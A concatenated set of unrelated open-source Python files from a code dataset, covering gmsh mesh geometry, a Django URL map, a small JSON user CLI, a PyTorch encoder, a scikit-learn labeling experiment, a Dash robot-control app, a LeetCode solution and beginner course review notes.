surface_to_physical_properties\n surface_to_physical_properties[tag] = {\"name\": name, \"index\": index}\n\n print(\"Defining new model using the OCC kernel\")\n gmsh.model.add(\"occ_model\")\n gmsh.model.setCurrent(\"occ_model\")\n\n print(\"Adding points\")\n for tag, coordinates in entities[\"points\"]:\n gmsh.model.occ.addPoint(*coordinates, tag=tag)\n\n print(\"Adding curves\")\n for tag, (p0, p1) in entities[\"curves\"]:\n gmsh.model.occ.addLine(p0, p1, tag=tag)\n\n print(\"Adding surfaces\")\n for tag, curve_tags in entities[\"surfaces\"]:\n wire_tag = gmsh.model.occ.addCurveLoop(curve_tags, tag=tag)\n stag = gmsh.model.occ.addPlaneSurface([wire_tag], tag=tag)\n\n print(\"Rotating model such that the surfaces align with the z-axis\")\n gmsh.model.occ.synchronize()\n bbox = gmsh.model.getBoundingBox(-1, -1)\n min, max = tuple(bbox[:3]), tuple(bbox[3:])\n gmsh.model.occ.rotate(\n dimTags=gmsh.model.getEntities(2),\n x=0.5*(max[0] - min[0]), y=min[1], z=0.0,\n ax=1.0, ay=0.0, az=0.0,\n angle=pi/2.0\n )\n\n print(\"Copying Surfaces to the back of the domain\")\n gmsh.model.occ.synchronize()\n frontside_surface_tags = gmsh.model.getEntities(dim=2)\n backside_surface_tags = gmsh.model.occ.copy(frontside_surface_tags)\n backside_dz = z_offset_at(SIZE_DOMAIN_Y)\n gmsh.model.occ.translate(backside_surface_tags, dx=0.0, dy=SIZE_DOMAIN_Y, dz=backside_dz)\n\n def _make_connecting_spline(source_tag: int, target_tag: int) -> tuple[int, list]:\n source = gmsh.model.getValue(0, source_tag, [])\n target = gmsh.model.getValue(0, target_tag, [])\n assert abs(source[0] - target[0]) < 1e-8*SIZE_DOMAIN_Y \\\n and abs(abs(source[2] - target[2]) - backside_dz) < 
1e-8*SIZE_DOMAIN_Y \\\n and \"Unexpected geometric relation between front and back side points\"\n\n extrusion_length = 5000.0\n num_support_points = 10\n dy = extrusion_length/float(num_support_points+1) # first/last point are source/target\n\n support_point_tags = [source_tag]\n for i in range(num_support_points):\n y_reference = source[1] + float(i + 1)*dy\n support_point_tags.append(\n gmsh.model.occ.addPoint(\n x=source[0],\n y=source[1] + y_reference,\n z=source[2] + z_offset_at(y_reference)\n )\n )\n return gmsh.model.occ.addBSpline(support_point_tags + [target_tag]), support_point_tags[1:]\n\n print(\"Creating connecting surfaces and volumes\")\n physical_volumes = {}\n front_point_to_connecting_spline_index = {}\n front_curve_to_connecting_surface_index = {}\n gmsh.model.occ.synchronize()\n for i, (front, back) in enumerate(zip(frontside_surface_tags, backside_surface_tags)):\n print(f\"Creating volume {i+1} of {len(frontside_surface_tags)}\", end=\"\\r\")\n front_boundary_curves = gmsh.model.getBoundary([front], recursive=False)\n back_boundary_curves = gmsh.model.getBoundary([back], recursive=False)\n assert len(front_boundary_curves) == len(back_boundary_curves)\n\n bounding_surface_tags = [front[1]]\n for front_curve, back_curve in zip(front_boundary_curves, back_boundary_curves):\n assert front_curve[1] > 0 and back_curve[1] > 0 \\\n or front_curve[1] < 0 and back_curve[1] < 0\n\n abs_front_curve = abs(front_curve[1])\n if abs_front_curve in front_curve_to_connecting_surface_index:\n bounding_surface_tags.append(front_curve_to_connecting_surface_index.get(abs_front_curve))\n else:\n front_curve_points = gmsh.model.getBoundary([front_curve], recursive=False)\n back_curve_points = gmsh.model.getBoundary([back_curve], recursive=False)\n assert len(front_curve_points) == len(back_curve_points)\n assert len(front_curve_points) == 2\n\n pfront_0, pfront_1 = front_curve_points[0][1], front_curve_points[1][1]\n pback_0, pback_1 = back_curve_points[0][1], back_curve_points[1][1]\n spline1, points1 = front_point_to_connecting_spline_index.get(pfront_0), []\n spline2, points2 = front_point_to_connecting_spline_index.get(pfront_1), []\n\n if spline1 is None:\n spline1, points1 = _make_connecting_spline(pfront_0, pback_0)\n front_point_to_connecting_spline_index[pfront_0] = spline1\n if spline2 is None:\n spline2, points2 = _make_connecting_spline(pfront_1, pback_1)\n front_point_to_connecting_spline_index[pfront_1] = spline2\n\n curve_loop = [spline1, spline2]\n if front_curve[1] < 0:\n curve_loop = list(reversed(curve_loop))\n wire_tag = gmsh.model.occ.addWire([front_curve[1], *curve_loop, -back_curve[1]])\n bounding_surface_tags.append(gmsh.model.occ.addSurfaceFilling(wire_tag, tag=wire_tag))\n front_curve_to_connecting_surface_index[abs_front_curve] = bounding_surface_tags[-1]\n\n # remove support points\n gmsh.model.occ.remove(dimTags=[(0, t) for t in points1], recursive=False)\n gmsh.model.occ.remove(dimTags=[(0, t) for t in points2], recursive=False)\n\n bounding_surface_tags.append(back[1])\n physical_props = surface_to_physical_properties[front[1]]\n physical_index = physical_props[\"index\"]\n surf_loop = gmsh.model.occ.addSurfaceLoop(bounding_surface_tags)\n volume_tag = gmsh.model.occ.addVolume([surf_loop])\n if physical_index not in physical_volumes:\n physical_volumes[physical_index] = {\"name\": physical_props[\"name\"], \"volumes\": []}\n physical_volumes[physical_index][\"volumes\"].append(volume_tag)\n\n print(\"Writing .brep geometry file\")\n base_filename = 
\"spe11c\"\n brep_filename = f\"{base_filename}.brep\"\n gmsh.model.occ.synchronize()\n gmsh.write(brep_filename)\n print(f\"Wrote '{brep_filename}'\")\n\n print(\"Writing .geo file with physical volume definitions\")\n geo_filename = f\"{base_filename}.geo\"\n with open(geo_filename, \"w\") as geo_file:\n geo_file.write(f'Merge \"{brep_filename}\";\\n')\n for physical_index, properties in physical_volumes.items():\n volume_tags_str = \",\".join(str(t) for t in properties[\"volumes\"])\n geo_file.write(f\"Physical Volume({physical_index}) = {{{volume_tags_str}}};\\n\")\n geo_file.write(f\"Characteristic Length{{:}} = {args['mesh_size']};\\n\")\n print(f\"Wrote '{geo_filename}'\")\n","repo_name":"Simulation-Benchmarks/11thSPE-CSP","sub_path":"geometries/make_spe11c_geo.py","file_name":"make_spe11c_geo.py","file_ext":"py","file_size_in_byte":8216,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"29"} +{"seq_id":"23575784644","text":"# demo/urls.py\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^NumberReport/', views.NumberReport, name='NumberReport'),\n url(r'^NumberOrganizeReport/', views.NumberOrganizeReport, name='NumberOrganizeReport'),\n]","repo_name":"MiracleShen/djangoProject","sub_path":"crm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72412154319","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport json\n\ndef add_user(users, name, email):\n user_id = max(user[\"id\"] for user in users) + 1\n new_user = {\"id\": user_id, \"name\": name, \"email\": email, \"favorite_cars\": []}\n users.append(new_user)\n return new_user\n\ndef delete_user(users, user_id):\n for user in users:\n if user[\"id\"] == user_id:\n users.remove(user)\n return\n print(\"No user with the specified ID was found\")\n\ndef add_car_to_user(users, user_id, car_id):\n user = get_user(users, user_id)\n if car_id not in user[\"favorite_cars\"]:\n user[\"favorite_cars\"].append(car_id)\n\ndef delete_car_from_user(users, user_id, car_id):\n user = get_user(users, user_id)\n if car_id in user[\"favorite_cars\"]:\n user[\"favorite_cars\"].remove(car_id)\n\ndef get_user(users, user_id):\n for user in users:\n if user[\"id\"] == user_id:\n return user\n print(\"The car is not assigned as a favorite to the user\")\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--add\", action=\"store_true\", help=\"Add a new user\")\n parser.add_argument(\"--delete\", type=int, help=\"Delete a user by their ID\")\n parser.add_argument(\"--add_car\", nargs=2, type=int, help=\"Add a car as a favorite to a user\")\n parser.add_argument(\"--delete_car\", nargs=2, type=int, help=\"Remove a car from a user's favorites list\")\n args = parser.parse_args()\n\n with open(\"../data/users.json\", \"r\") as users_file:\n data = json.load(users_file)\n users = data[\"usuarios\"]\n\n if args.add:\n name = input(\"Enter the name of the new user: \")\n email = input(\"Enter the email of the new user: \")\n new_user = add_user(users, name, email)\n print(\"The new user has been added with ID \" + str(new_user['id']))\n elif args.delete:\n delete_user(users, args.delete)\n print(\"User has been deleted successfully\")\n \n elif args.add_car:\n add_car_to_user(users, args.add_car[1], args.add_car[0])\n print(\"The car has been added as a favorite to the user 
successfully\")\n \n elif args.delete_car:\n delete_car_from_user(users, args.delete_car[1], args.delete_car[0])\n print(\"Car successfully removed from user favorites list\")\n \n else:\n print(\"No valid command specified\")\n\n with open(\"../data/users.json\", \"w\") as users_file:\n json.dump(data, users_file, indent=2)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fximenessilva/cars_app","sub_path":"frontend/src/script/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29829071616","text":"import abc\n\n\nclass ConfigCreator(metaclass=abc.ABCMeta):\n\n def __init__(self, layers, count_id):\n self.layers = layers\n self.count_id = count_id\n\n def write_file(self, file):\n pass\n\n\nclass ConfigCreatorCmd(ConfigCreator):\n\n commands = dict()\n\n def set_section_commands(self):\n sections = self.layers.get_sections_of_count(self.count_id)\n\n self.set_command(\n 'SITE',\n self.layers.get_installation_name_of_count(self.count_id))\n self.set_command('LOCATION', sections[0].attribute('name'))\n self.set_command(\n 'FILENAME',\n self.layers.get_installation_name_of_count(self.count_id))\n self.set_command(\n 'CLASS',\n self.layers.get_class_name_of_count(self.count_id))\n self.set_command('LPLENS', '200')\n\n lanes = self.layers.get_lanes_of_count(self.count_id)\n sensor_type = self.layers.get_sensor_type_of_count(self.count_id)\n channels_str = ''\n sensors_str = ''\n carriageway_nr = 0\n sensor_length = None\n\n for i, lane in enumerate(lanes):\n channels_str += '{} '.format(i+1)\n if sensor_type.attribute('name') == 'Boucle':\n sensors_str += '{} '.format('LL')\n else:\n sensors_str += '{} '.format('TT')\n\n if self.layers.check_sensor_of_lane(lane.id()):\n carriageway_nr += 1\n\n length = self.layers.get_sensor_length(lane.id())\n if length:\n sensor_length = length\n\n self.set_command('CHANNELS', channels_str)\n self.set_command('SENSORS', sensors_str)\n\n self.set_command(\n 'CARRIAGEWAY',\n ' '.join('1' * carriageway_nr) + ' ' + ' '.join('0' * (8 - carriageway_nr)))\n\n if sensor_length and sensor_length < 6:\n self.set_command('LPSEPS', '300')\n else:\n self.set_command('LPSEPS', '500')\n\n def set_command(self, command, value):\n self.commands[command] = value\n\n def set_predefined_config(self):\n return self.layers.get_predefined_config_from_count(self.count_id)\n\n def write_file(self, file):\n with open(file, 'w') as f:\n f.write('{}\\n'.format(self.set_predefined_config()))\n for command in self.commands.keys():\n f.write('{} = {}\\n'.format(command, self.commands[command]))\n","repo_name":"opengisch/OpenComptage","sub_path":"comptages/config/config_creator.py","file_name":"config_creator.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"21128309736","text":"import torch\r\nfrom torch import nn\r\nfrom .common import ResnetBlock\r\n\r\n\r\nclass EncoderBlock(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding):\r\n super(EncoderBlock, self).__init__()\r\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)\r\n self.bn = nn.BatchNorm2d(out_channels)\r\n self.activition = nn.LeakyReLU(1)\r\n\r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.bn(x)\r\n x = self.activition(x)\r\n return x\r\n\r\n\r\nclass EncoderNetwork(nn.Module):\r\n def 
__init__(self,\r\n image_size,\r\n in_channels,\r\n use_labelmap=False,\r\n latent_dim=512,\r\n base_channels=16,\r\n num_layers=3):\r\n super(EncoderNetwork, self).__init__()\r\n\r\n total_layers = num_layers + 1\r\n assert (image_size % (2**total_layers) == 0) and (image_size > 0)\r\n\r\n self.image_size = image_size\r\n self.use_labelmap = use_labelmap\r\n self.latent_dim = latent_dim\r\n input_channels = in_channels + self.use_labelmap\r\n conv_layers = [EncoderBlock(input_channels, base_channels, 4, 2, 1)] # first encoder layer\r\n for i in range(num_layers):\r\n channels = base_channels * (2**i)\r\n conv_layers += [\r\n ResnetBlock(channels),\r\n EncoderBlock(channels, channels * 2, kernel_size=4, stride=2, padding=1)\r\n ]\r\n\r\n conv_out_channels = base_channels * (2**num_layers)\r\n conv_layers += [ResnetBlock(conv_out_channels)]\r\n self.conv = nn.Sequential(*conv_layers)\r\n\r\n conv_out_features = (image_size // (2**total_layers))**2\r\n self.fc = nn.Linear(conv_out_features * conv_out_channels, self.latent_dim)\r\n\r\n def forward(self, x, labelmap=None):\r\n if self.use_labelmap:\r\n assert labelmap is not None\r\n x = torch.cat((x, labelmap), 1)\r\n x = self.conv(x)\r\n x = x.view(x.shape[0], -1)\r\n x = self.fc(x)\r\n return x\r\n","repo_name":"dhbloo/ChunkGAN-pytorch","sub_path":"networks/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37273350794","text":"\"\"\"\nDefine a function pyramid_volume with parameters base_length, base_width, and pyramid_height, that returns the volume of a pyramid with a rectangular base.\n\nSample output with inputs: 4.5 2.1 3.0\nVolume for 4.5, 2.1, 3.0 is: 9.45\nRelevant geometry equations:\nVolume = base area x height x 1/3\nBase area = base length x base width.\n\"\"\"\n\ndef pyramid_volume(base_length, base_width, pyramid_height):\n base_area = base_length * base_width\n volume = base_area * pyramid_height * (1/3)\n return volume\n\nlength = float(input())\nwidth = float(input())\nheight = float(input())\nprint(f'Volume for {length}, {width}, {height} is:', pyramid_volume(length, width, height))\n","repo_name":"bdpetersen13/IT140-Introduction-to-Scripting","sub_path":"Module_Five/Function_Definition.py","file_name":"Function_Definition.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"430782537","text":"import os\n\nimport numpy as np\nimport pandas as pd\nfrom dotenv import load_dotenv\nfrom sacred import Experiment\nfrom sacred.observers import MongoObserver\n\nfrom sklearn.datasets import load_digits\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import svm, neural_network\nfrom matplotlib import pyplot as plt\n\nfrom Transimprove.Pipeline import Pipeline\nfrom Experiments.helper.create_distributed_labels import generate_new_annotations_confusionmatrix\nfrom yellowbrick.classifier import ClassificationReport\nfrom yellowbrick.classifier import ConfusionMatrix\n\n\"\"\"\n This script runs our experiments using Scikit-learn. It uses the same logic as designed in the proof_of_concept.py and\n saves all parameters using sacred.\n Make sure that the docker containers are running. 
See the README.md for execution instructions and the sacred\n documentation at https://sacred.readthedocs.io.\n For pipeline application see the Transimprove readme in the Transimprove folder.\n \"\"\"\n\nex = Experiment('SklearnProofOfConcept')\nload_dotenv()\nmongodb_port = os.getenv(\"MONGO_DB_PORT\")\nuri = \"mongodb://sample:password@localhost:\" + str(mongodb_port) + \"/db?authSource=admin\"\nex.observers.append(MongoObserver.create(url=uri, db_name='db'))\n\n\n@ex.config\ndef cfg():\n train_size = 0.9\n test_size = 0.4\n train_random = 42\n test_random = 42\n gamma = 0.001\n confusion_matrix = np.array([\n # ['0', 1, 2, 3, 4 5 6 7 8 9]\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 0\n [0, 0.7, 0, 0, 0, 0, 0, 0.3, 0, 0], # 1\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], # 2\n [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], # 3\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], # 4\n [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], # 5\n [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], # 6\n [0, 0.3, 0, 0, 0, 0, 0, 0.7, 0, 0], # 7\n [0, 0, 0, 0, 0, 0, 0, 0, 0.7, 0.3], # 8\n [0, 0, 0, 0, 0, 0, 0, 0, 0.3, 0.7] # 9\n ])\n consistency_min = 0.5\n consistency_max = 1.0\n annotations_per_label = 1000\n\n\ndef classifier_report(classifier, X_test, y_test):\n classes = np.unique(y_test)\n cm = ConfusionMatrix(classifier, classes=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n cm.fit(X_test, y_test)\n cm.score(X_test, y_test)\n filename = classifier.__class__.__name__ + '_confusion_matrix.png'\n cm.poof(outpath=filename, clear_figure=True,\n kwargs=dict(transparent=False, dpi=80, inches='tight'))\n ex.add_artifact(filename)\n visualizer = ClassificationReport(classifier, classes=classes, support=True)\n visualizer.fit(X_test, y_test)\n visualizer.score(X_test, y_test)\n visualizer.poof(outpath=\"classification_report.png\", clear_figure=True,\n kwargs=dict(transparent=False, dpi=80, inches='tight'))\n ex.add_artifact('classification_report.png')\n\n\n@ex.capture\ndef create_dataset_split(X, y, train_size, train_random, test_size, test_random):\n X_existing_model, X_unseen, y_existing_model, y_unseen = train_test_split(X, y, test_size=train_size,\n random_state=train_random)\n X_to_annotate, X_test, y_train_unknown, y_test = train_test_split(X_unseen, y_unseen, test_size=test_size,\n random_state=test_random)\n return X_existing_model, X_unseen, y_existing_model, y_unseen, X_to_annotate, X_test, y_train_unknown, y_test\n\n\ndef compute_scores(X_test, X_to_annotate, consistencies, transimporve_pipeline, y_test, y_train_unknown):\n scores = []\n for consistency in consistencies:\n transimporve_pipeline.fit(consistency)\n\n classifier_truth = neural_network.MLPClassifier()\n classifier_truth.fit(X_to_annotate, y_train_unknown.ravel())\n\n X_certain, y_certain = transimporve_pipeline.certain_data_set(return_X_y=True)\n if not X_certain is None:\n classifier_certain = neural_network.MLPClassifier()\n classifier_certain.fit(X_certain, y_certain.ravel())\n\n X_full, y_full = transimporve_pipeline.full_data_set(return_X_y=True)\n classifier_full = neural_network.MLPClassifier()\n classifier_full.fit(X_full, y_full.ravel())\n\n scores.append(classifier_truth.score(X_test, y_test))\n if X_certain is None:\n scores.append(0.0)\n else:\n scores.append(classifier_certain.score(X_test, y_test))\n scores.append(classifier_full.score(X_test, y_test))\n return scores\n\n\ndef plot_score_comparisons(certainties, consistency_min, scores):\n scores = np.array(scores).reshape(len(certainties), 3)\n data = pd.DataFrame(data=scores, index=certainties, columns=['Ground Truth', 'Certain Score', 'Full Score'])\n fig, ax 
= plt.subplots()\n data.plot(ax=ax)\n ax.set_xlim([consistency_min, 1])\n ax.set(xlabel='Consistency', ylabel='Accuracy')\n ax.set_title('Score Comparison', fontsize=14, fontweight='bold')\n plt.show()\n fig.savefig('score_comparison.png', transparent=False, dpi=80, inches='tight')\n ex.add_artifact('score_comparison.png')\n\n\n@ex.automain\ndef my_main(confusion_matrix, gamma, consistency_min, consistency_max, annotations_per_label):\n X, y = load_digits(return_X_y=True)\n X_existing_model, X_unseen, y_existing_model, y_unseen, X_to_annotate, X_test, y_train_unknown, y_test = create_dataset_split(\n X, y)\n existing_classifier = svm.SVC(gamma=gamma)\n existing_classifier.fit(X_existing_model, y_existing_model)\n classifier_report(existing_classifier, X_test, y_test)\n\n allLabels = np.unique(y_train_unknown)\n annotations = generate_new_annotations_confusionmatrix(confusion_matrix, allLabels, y_train_unknown,\n count=annotations_per_label,\n normalize=False)\n id_datapoint = pd.DataFrame(X_to_annotate).reset_index().values\n transimporve_pipeline = Pipeline(id_datapoint, annotations, models=[(\"MNIST SVM\", existing_classifier)])\n consistency = np.arange(consistency_min, consistency_max, 0.01)\n\n scores = compute_scores(X_test, X_to_annotate, consistency, transimporve_pipeline, y_test, y_train_unknown)\n plot_score_comparisons(consistency, consistency_min, scores)\n","repo_name":"transimprove/Transimprove","sub_path":"Experiments/SklearnExperimentDigits.py","file_name":"SklearnExperimentDigits.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"17068273903","text":"# Run this app with `python app.py` and\n# visit http://192.168.0.102:8050/ in your web browser.\n\nimport dash\n#import dash_html_components as html\nfrom dash import html\n#import dash_core_components as dcc\nfrom dash import dcc\n#import plotly.express as px\n#import pandas as pd\nimport dash_daq as daq\nimport serial\nimport time, math\nimport threading\nimport json\nimport plotly.graph_objs as go\nimport plotly\nimport logging\n\nX = [0]\nY = [0]\nprox_sensor_names = ['Left-Left', 'Left', 'Center', 'Right', 'Right-Right']\nline_sensor_values = [0, 0, 0, 0, 0]\n\nclockwise_arr = [0] * 100\ncounter_clockwise_arr = [0] * 100\n\ncounter = 0\n\nser = serial.Serial('/dev/ttyACM0') # open serial port\n#ser = serial.Serial('COM3', baudrate = 9600, timeout = 1)\n\n# variables\nzumoAngle = 0\nzumoSpeed = 0\nauto_flag = 0\n\n# Initialise the app\napp = dash.Dash(__name__)\n\n# Define the app\napp.layout = html.Div(children=[daq.Joystick(id='my-joystick', label=\"Zumo Joystick\", angle=0, size=100),\n html.Div(id='joystick-output'),\n html.Div(className='row', children=[html.Button('Automatic', id='auto_button', n_clicks=0),\n html.Button('Manual', id='manual_button', n_clicks=0),\n html.Div(id='Button output'),\n html.Div([dcc.Graph(id = 'live-graph', animate = True),\n dcc.Interval(id = 'graph-update', interval = 1000, n_intervals = 0),\n html.Div([dcc.Graph(id = 'live-barchart', animate = True),\n dcc.Interval(id = 'barchart-update', interval = 1000, n_intervals = 0)])\n])])])\n\n@app.callback(dash.dependencies.Output('live-graph', 'figure'),\n dash.dependencies.Input('graph-update', 'n_intervals'))\n\ndef update_graph_scatter(n):\n X.append(X[-1]+1)\n Y.append(Y[-1]+1)\n\n data = go.Scatter(x=list(X), y=list(Y), name='Scatter', mode='lines+markers')\n return {'data': [data],\n 'layout': go.Layout(xaxis=dict(range=[min(X), 
max(X)]),\n yaxis=dict(range=[min(Y), max(Y)]))}\n\n@app.callback(dash.dependencies.Output('live-barchart', 'figure'),\n [dash.dependencies.Input('barchart-update', 'n_intervals')])\n\ndef update_graph_bar(n):\n clrs = []\n colorred = 'rgb(222,0,0)'\n colorgreen = 'rgb(0,222,0)'\n for i in range(len(line_sensor_values)):\n if (line_sensor_values[i] > 5):\n clrs.append(colorred)\n else:\n clrs.append(colorgreen)\n\n traces = list()\n traces.append(plotly.graph_objs.Bar(x=prox_sensor_names, y=line_sensor_values, name='Bar', marker=dict(color=clrs)))\n layout = go.Layout(barmode='group', yaxis=dict(range=[0, max(line_sensor_values)]))\n if traces is not None and layout is not None:\n return {'data': traces, 'layout': layout}\n\n@app.callback(dash.dependencies.Output('Button output', 'children'),\n [dash.dependencies.Input('auto_button', 'n_clicks'),\n dash.dependencies.Input('manual_button', 'n_clicks')])\n\ndef displayClick(auto_button, manual_button):\n global auto_flag, clockwise_arr, counter_clockwise_arr\n msg = 'manual_button was most recently clicked'\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n if 'auto_button' in changed_id:\n msg = 'auto_button was most recently clicked'\n auto_flag = 1\n clockwise_arr = [0] * 100\n counter_clockwise_arr = [0] * 100\n elif 'manual_button' in changed_id:\n msg = 'manual_button was most recently clicked'\n auto_flag = 0\n\n return html.Div(msg)\n\n@app.callback(\n dash.dependencies.Output('joystick-output', 'children'),\n [dash.dependencies.Input('my-joystick', 'angle'),\n dash.dependencies.Input('my-joystick', 'force')])\n\ndef update_output(angle, force=0):\n print(\"update_output\")\n global zumoSpeed, zumoAngle\n if force is None:\n force = 0\n if isinstance(angle, (int, float)):\n zumoAngle = angle\n else:\n zumoAngle = 0\n\n if isinstance(force, (int, float)):\n zumoSpeed = force\n else:\n zumoSpeed = 0\n\n return ['Angle is {}'.format(angle),\n html.Br(),\n 'Force is {}'.format(zumoSpeed)]\n\ndef TransmitThread():\n print (\"transmitThread\")\n global control_params, clockwise_arr, counter_clockwise_arr\n while ser.isOpen:\n global zumoSpeed, zumoAngle, auto_flag\n if zumoAngle is None:\n zumoAngle = 0\n if zumoSpeed is None:\n zumoSpeed = 0\n joyY = math.sin(math.radians(zumoAngle))*zumoSpeed*200\n joyX = math.cos(math.radians(zumoAngle))*zumoSpeed*200\n if sum(counter_clockwise_arr) > sum(clockwise_arr):\n direction = '0'\n else:\n direction = '1'\n msg = ''\n msg = str(auto_flag) + ';' + direction + '.' 
+ str(joyX) + ',' +str(joyY) +'\\r\\n'\n ser.write(msg.encode('ascii'))\n time.sleep(0.1)\n\ndef ReceiveThread():\n global line_sensor_values, clockwise_arr, counter_clockwise_arr, counter\n while(ser.isOpen):\n if (ser.in_waiting > 0):\n sensor = ser.readline().decode('ascii')\n data = json.loads(sensor)\n #for key in data.keys():\n #print(key + \": \" + str(data[key]))\n for i in range(len(data[\"line_sensor_values\"])):\n line_sensor_values[i] = data[\"line_sensor_values\"][i]\n counter_clockwise_arr[counter%100] = line_sensor_values[0] + line_sensor_values[1]\n clockwise_arr[counter%100] = line_sensor_values[3] + line_sensor_values[4]\n print(line_sensor_values)\n #if sum(clockwise_arr) > sum(counter_clockwise_arr):\n #print('clockwise')\n #else:\n #print('counterclockwise')\n counter += 1\n else:\n time.sleep(0.05)\n\n# Run the app\n#if __name__ == '__main__':\n #app.run_server(debug=True, host='0.0.0.0')\ndef start_app():\n #app.run_server(debug=True)\n app.server.run(port=8050, host='0.0.0.0')\n\ndef initializeThreads():\n #global zumoAngle, zumoSpeed\n #counter = 0\n #zumoAngle = 0 \n #zumoSpeed = 0\n # suppress logging\n log = logging.getLogger('werkzeug')\n log.setLevel(logging.ERROR)\n \n t1 = threading.Thread(target=start_app)\n t2 = threading.Thread(target=ReceiveThread)\n t3 = threading.Thread(target=TransmitThread) \n t1.start()\n t2.start()\n t3.start()\n t1.join()\n t2.join()\n t3.join()\n\n#t1 = threading.Thread(target=TransmitThread)\n#t2 = threading.Thread(target=ReceiveThread)\n#t3 = threading.Thread(target=start_app) \n#t1.start()\n#t2.start()\n#t3.start()\n#t1.join()\n#t2.join()\n\nif __name__ == \"__main__\":\n initializeThreads()","repo_name":"TALs-Education/ZumoPi","sub_path":"ZumoPi_V01/WorkSpace/backup/WS_Zumo/zumoEmbedded/zumoEmbedded2.py","file_name":"zumoEmbedded2.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74472382479","text":"\"\"\"\nInput: \"Hello World\"\nOutput: 5\n\nEvery word is separated by ' '.\nSo the task is to scan from the end and find the first space. In Python, of course, splitting the string and taking [-1] is the easiest way to write it.\nWe also have to make sure the tail does not start with ' '; we need to reach the first real word.\n\nTest cases:\nhttps://leetcode.com/problems/length-of-last-word/description/\n\n\"\"\"\nclass Solution(object):\n def lengthOfLastWord(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n \n result = 0\n flag = False\n \n for i in s[::-1]:\n if i == ' ' and not flag:\n continue\n elif i == ' ' and flag:\n return result\n else:\n result += 1\n flag = True\n continue\n \n return result\n","repo_name":"HuberTRoy/leetCode","sub_path":"String/LengthOfLastWord.py","file_name":"LengthOfLastWord.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":1806,"dataset":"github-code","pt":"29"} +{"seq_id":"20347262852","text":"# review.py\n\n# csc 281 in winter?\n\n##### final exam #####\n\n'''\nUsual classroom\nNOT the usual time\nThurs Nov 19\n8:30-10:45\n'''\n\n##### pd tourney #####\n\n##### review #####\n\n'''\nfor any class/type:\n operators\n mutable/immutable\n functions: len(lst)\n methods: lst.append(4.5)\n\nnumbers:\n bool < int < float\n ops: +,-, *,/,//,%, ** (what is precedence?)\n +=, -=, *=, ...\n bool ops: >,<,<=,>=,==,!=\n funs: sum, abs, max, min\n\nstr:\n indexed sequence of characters\n s[i] - indexing\n s[start:stop:step] - slicing\n immutable: s=s.upper()\n ops: +, int*str\n <,>,<=,>=,.... 
- dictionary comparisons\n in, not in - work on substrs\n functions: len\n methods: split, upper, lower, find, count, replace\n\nlist:\n indexed sequence of items (anything)\n mutable: lst.sort()\n lst[i] - an item\n lst[start:stop:step] - a sub-list\n ops: +, int*list, list*int\n in, not in - looks for item (not sublist)\n functions: len, sum, max, min\n methods: append, index, count, pop\n sort, reverse, remove\n\nrange:\n sequence of ints (arithmetic)\n immutable\n range(n)\n range(start,stop)\n range(start,stop,step)\n used for indexed iteration \n\ndict:\n container for key:value pairs\n {key:val, key:val, ...}, {}\n mutable, keys are unique and immutable\n not ordered\n d[key]=val\n d[key] retrieves a value\n in, not in - work on keys\n funs: len\n methods: pop(key)\n\ntuple\n (item,item,...)\n like a list, but immutable\n can be dict keys\n x,y = 2,3\n\nset:\n {item,item,item,....}\n like a list, BUT items must be unique and immutable\n not ordered\n empty set - s=set() NOT s={}\n mutable\n in, not in\n functions: len\n methods: add, remove\n\nfile:\n open(filename) - opens for reading\n open(filename,'w') - for writing\n read() - get back file as a str\n readlines() - get back list of strs\n write( string)\n close()\n\nmath\n import math\n math.pi, math.sin()\n other functions, constants\n\nrandom\n import random\n randrange(start,stop)\n choice( iterable )\n seed, sample, shuffle\n\ncontrol structures:\n if\n if,(elif),else - execute EXACTLY one block\n for\n while\n loop mods: return, break, (pass, continue)\n\ntry/except:\n\n try:\n code may cause error\n except:\n run this if error occurs\n\nprint vs. return\n\nloop patterns:\n\n\"standard iteration\" uses iterators:\n\n for char in string:\n for item in list:\n for i in range(n)\n for key in dict:\n for item in set:\n\n>>> for word in \"hello how are you\":\n\tprint( word )\n\n\t\nh\n...\no\nu\n>>> \n\nword is a TERRIBLE variable name in this case\n\n>>> for word in \"hello how are you\".split():\n\tprint( word )\n\n\t\nhello\nhow\nare\nyou\n>>>\n\ncounter/index/range iteration:\nuse when you need index, location information\n\n>>> for i in range(len(s)):\n\tprint( 